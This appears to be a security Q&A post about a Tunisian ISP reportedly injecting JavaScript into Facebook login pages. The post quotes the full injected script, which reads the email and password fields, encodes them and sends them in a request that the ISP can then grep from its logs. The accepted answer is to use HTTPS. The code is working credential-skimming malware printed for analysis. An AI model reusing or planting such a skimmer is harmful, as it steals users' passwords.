# Javascript injection by ISP

Tags: javascript, facebook, security, code-injection

This page claims that a Tunisian ISP was injecting javascript into the source code of Facebook pages:

http://www.r00ted.com/doku.php?id=injection_tunisie

```
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
 var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
 var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
```

According to the page the user wo0dh3ad doesn't exist but this would allow to do a simple grep in logs to get user's passwords (or password hashes).

```
grep wo0dh3ad /var/log/FAI.log
```

Is this actually possible to do? If so, would there be a way to detect some tampering with a page just to say that something is odd and another browser/connection should be used?

Answer (score 2, accepted):

Use SSL (HTTPS) to protect against man-in-the-middle attacks.